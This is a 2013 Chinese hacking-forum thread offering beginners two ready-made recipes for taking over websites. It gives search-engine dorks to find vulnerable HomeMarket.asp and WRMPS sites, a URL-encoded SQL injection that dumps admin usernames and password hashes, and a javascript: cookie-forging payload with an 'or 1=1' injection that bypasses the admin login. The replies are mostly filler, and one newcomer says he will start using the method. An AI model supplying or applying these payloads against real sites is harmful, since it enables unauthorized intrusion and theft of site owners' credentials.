数据漏洞拿站（非原创很多是万人骑适合新手）

显示全部楼层 · 发表于 2013-10-24 09:09:32

本帖最后由 smallyang 于 2013-10-26 15:17 编辑

漏洞1
谷歌百度搜索关键字：inurl:"HomeMarket.asp"（用引擎搜索即可）

在域名后面加： NewsType.asp?
SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='（然后再域名后面加上这句）里面的MD5需要自己解后台用御剑扫

（漏洞2）
Powered by WRMPS（同样搜素）

admin/admin_login.asp（加域名后面）这个是后台地址

javascript:alert(document.cookie="admin=managecode="+escape("WRMPS6")+"&pass="+escape("cbi")+"&admin="+escape("admin' or '1'='1' or '1'='1")+";path=/;"); （复制放在域名上面比如www.xxx.com/XXXXXXX右键全选然后直接放进去回车）

admin/admin_manage.asp（然后域名后面再放这个回车)如果站长没做修改就直接进去了

显示全部楼层 · 发表于 2013-10-24 09:10:31

这是什么东东啊

显示全部楼层 · 发表于 2013-10-24 09:15:46

这是什么东东啊

显示全部楼层 · 发表于 2013-10-24 12:45:56

杨儿啊，你这让我..........

显示全部楼层 · 发表于 2013-10-24 14:22:40

潜水是一种美德，回帖是一种责任！

显示全部楼层 · 发表于 2013-10-26 15:17:48

滥情发表于 2013-10-24 12:45
杨儿啊，你这让我..........

？？？？？？？？

显示全部楼层 · 发表于 2013-12-4 22:44:40

路过学习一下

显示全部楼层 · 发表于 2013-12-8 08:51:15

谢谢楼主了，我是新手，我先使着，学习下太感谢了